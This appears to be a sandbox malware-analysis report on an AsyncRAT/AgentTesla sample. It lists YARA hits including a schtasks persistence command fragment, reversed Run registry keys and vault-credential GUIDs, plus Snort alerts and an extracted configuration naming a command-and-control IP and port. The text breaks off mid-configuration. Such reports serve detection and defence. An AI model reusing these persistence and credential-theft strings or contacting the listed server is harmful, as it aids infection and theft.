4.2.vokleakA.pif.31be4ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31be4ec6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.2701d590.5.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.2701d590.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.3.vokleakA.pif.2ff3d950.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.3.vokleakA.pif.2ff3d950.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.3.vokleakA.pif.2ff3d950.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.3.vokleakA.pif.2ff3d950.0.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.3.vokleakA.pif.2ff3d950.0.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.3.vokleakA.pif.2ff3d950.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.34af0000.8.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34af0000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34af0000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34af0000.8.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
9.2.vokleakA.pif.34af0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34af0000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.3305d590.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.3305d590.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.3305d590.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.3305d590.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.3305d590.5.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
4.2.vokleakA.pif.3305d590.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.3305d590.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.32ef5570.5.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.32ef5570.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.32ef5570.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.32ef5570.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.32ef5570.5.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9f66f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0xae058:$a2: Stub.exe 0xae0e8:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x968ec:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x9f887:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9f6ff:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient 0x96811:$a6: get_SslClient
9.2.vokleakA.pif.32ef5570.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9f701:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.32ef5570.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa02e0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa0352:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa03dc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa046e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa04d8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa054a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa05e0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0xa0670:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.34c30000.8.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.34c30000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.34c30000.8.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.34c30000.8.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4584f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x54238:$a2: Stub.exe 0x542c8:$a2: Stub.exe 0x3cacc:$a3: get_ActivatePong 0x45a67:$a4: vmware 0x458df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3c9f1:$a6: get_SslClient
4.2.vokleakA.pif.34c30000.8.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x458e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.34c30000.8.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x464c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x46532:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x465bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4664e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x466b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4672a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x46850:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.31e40000.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.31e40000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.31e40000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.31e40000.3.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
4.2.vokleakA.pif.31e40000.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.31e40000.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.34af0000.8.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34af0000.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34af0000.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.34af0000.8.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34af0000.8.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
9.2.vokleakA.pif.34af0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34af0000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.vokleakA.pif.34490ee8.7.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
9.2.vokleakA.pif.34490ee8.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vokleakA.pif.34490ee8.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.vokleakA.pif.34490ee8.7.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.vokleakA.pif.34490ee8.7.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x47867:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient
9.2.vokleakA.pif.34490ee8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
9.2.vokleakA.pif.34490ee8.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.25de3fde.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.25de3fde.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.25de3fde.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.vokleakA.pif.25de3fde.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.25de3fde.1.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x48537:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56f20:$a2: Stub.exe 0x56fb0:$a2: Stub.exe 0x3f7b4:$a3: get_ActivatePong 0x4874f:$a4: vmware 0x485c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3f6d9:$a6: get_SslClient
7.2.vokleakA.pif.25de3fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x485c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.25de3fde.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x491a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4921a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x492a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x49336:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x493a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x49412:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x494a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x49538:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
7.2.vokleakA.pif.25de3fde.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.vokleakA.pif.25de3fde.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.vokleakA.pif.25de3fde.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
7.2.vokleakA.pif.25de3fde.1.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x46737:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x55120:$a2: Stub.exe 0x551b0:$a2: Stub.exe 0x3d9b4:$a3: get_ActivatePong 0x4694f:$a4: vmware 0x467c7:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3d8d9:$a6: get_SslClient
7.2.vokleakA.pif.25de3fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x467c9:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
7.2.vokleakA.pif.25de3fde.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x473a8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x4741a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x474a4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x47536:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x475a0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x47612:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x476a8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x47738:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
4.2.vokleakA.pif.33006458.6.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.vokleakA.pif.33006458.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.vokleakA.pif.33006458.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.2.vokleakA.pif.33006458.6.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vokleakA.pif.33006458.6.raw.unpack	Windows_Trojan_Asyncrat_11a11ba1	unknown	unknown	0x4764f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x9e787:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn " 0x56038:$a2: Stub.exe 0x560c8:$a2: Stub.exe 0xad170:$a2: Stub.exe 0xad200:$a2: Stub.exe 0x3e8cc:$a3: get_ActivatePong 0x95a04:$a3: get_ActivatePong 0x47867:$a4: vmware 0x9e99f:$a4: vmware 0x476df:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x9e817:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS 0x3e7f1:$a6: get_SslClient 0x95929:$a6: get_SslClient
4.2.vokleakA.pif.33006458.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x476e1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x9e819:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
4.2.vokleakA.pif.33006458.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x482c0:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x9f3f8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x48332:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x9f46a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x483bc:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x9f4f4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x4844e:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x9f586:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x484b8:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x9f5f0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x4852a:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x9f662:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x485c0:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x9f6f8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x48650:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x9f788:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.PCMNil7wkU.exe.4100000.4.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Click to see the 358 entries

Snort Signatures

ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) - Source IP: 139.84.229.159 - Destination IP: 192.168.2.5

Timestamp:	139.84.229.159192.168.2.52017497072030673 01/23/24-14:33:00.107795
SID:	2030673
Source Port:	2017
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic AsyncRAT Style SSL Cert - Source IP: 139.84.229.159 - Destination IP: 192.168.2.5

Timestamp:	139.84.229.159192.168.2.52017497072035595 01/23/24-14:33:00.107795
SID:	2035595
Source Port:	2017
Destination Port:	49707
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp	Malware Configuration Extractor: AsyncRAT {"Ports": ["2017"], "Server": ["139.84.229.159"], "Mutex": "jhT6lZT93vW5", "Certificate": "MIIE8jCCAtqgAwIBAgIQAN/vhz0nNn3o7T4qYMdf5TANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjQwMTIwMDc0NTQxWhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKPPaC+bexLNgYSa0NaH9Mas6Ou1FeJxZDQs1XPqMlqBb4BLKoRgzV3Z82q8tEvHr6A/Csxa280BBC5nf2ja3uOH8VUPNfp3lOyZC1QRuYCBQxPqGpXUr6nel/tUWCAwfWSqurDw2DdMu/5Ndp85oMxZm0G1KbrJG7gVrTbq0Y3zkQew6yObf5c50xLj73NYa5ku7IS19xTHC4XM63vQiDH8cJ0DzDIt0J05qHOBUkX2xIMndVbx+fOEMsxJybe8xR12vw2MHuZliUjeBNBJN9GCvMjBgNz9mjZNj9BUgTlKO9siur+46Ouy4GhvJxqenLpSN9geEmbSzHJnNkjyPbsjj+4h0PAxtifWYlkcZlWAKu0zkq1lqZ1rMB6ojlu3VOC/6JLi5eiFei2g6IGXniGEGe0ZczXhwtxJ5TSp0EECaMiPXI6IJdOh4AyAk04CkzMxUEWbN4/nxgpCzjKhf3XiU0GA4jVKMsCmxCaInTbxJMb90NumMmBAeW+ProvQSQPK1EC1CwJ8CS6yAsG30LOCp2dYWFfiBfH1sKOtUQECaHRje3W0Bp8QP6WUuoAEs2WxY4adHP8gayXXy97fjm+UikzsghlRmmGff6Osu5bWAsuipS3JxDdW9b0to1BeYB3QDGl3b/ay2MNEMNYcX36LF8rHxTRrvJoXzLEOyUNdAgMBAAGjMjAwMB0GA1UdDgQWBBQaTinJBsSVCYrN1fxnyZFNbQGpDTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQCGloMi9BEkVs4W9D/6Ma2u+1ThujGbyOCbcsWJOsnZfefykICVbdmQVBzaF8LKAAVXRs2kQvkmYA63llhWXcos3meeJFLsVFHN3x7n8Ec61ukHN6WzctLldLsw9RIlckqHvKLLEaCQtFFb1c4fVDa7Ux8YSS89hxb5iYUFSphdMyc2UCRyQE61+Wu+oaFxFKZ7JQdAQ9Kqz5NAfbeL+CqBr1HXdMtGINjVzlG/BfIkYsGWfJ8tk9Y4IOVuEOY1QoY7WpSF3Avk0joZgcAxy+FwBW4B1ID/B2iLGis5dyG5xEfhMam+0Ix+4Q3br93dqt7t/4s5Ox7g5jwyX7RyjzctvFkzaUQ4Y0ZNy/H1x+GoJfU+YTkx6mVofXOTGvmgPX7dVfhS9TnaMjJc+HdXjtuVxhn+cs/Zawyt8Aa7tNkNAA72peOiEvLeWhyQ8Mwv8LMSngC/9w55VezQ9N+MymQ35FC+He4/GPJPCLaC/ga4UG55Fs+kWOzTHxlqzyg72p9XB3IvOHKRPpYn1GH/VYILAOM4uesDkhCpvA2GgCgU9ij/y0/iLKw4LKoSA8GfoiHYn2H1xOJmrWdksJ+YbhAv1jMNpkaUaM8Bpz1ZsOc9dLjd4ts6XFQWBmyRS8Y3gGt/g8Wd+9CzkA6ux/H5jKN4p1el/StAuo2HdbHB07hbsg==", "Server Signature": 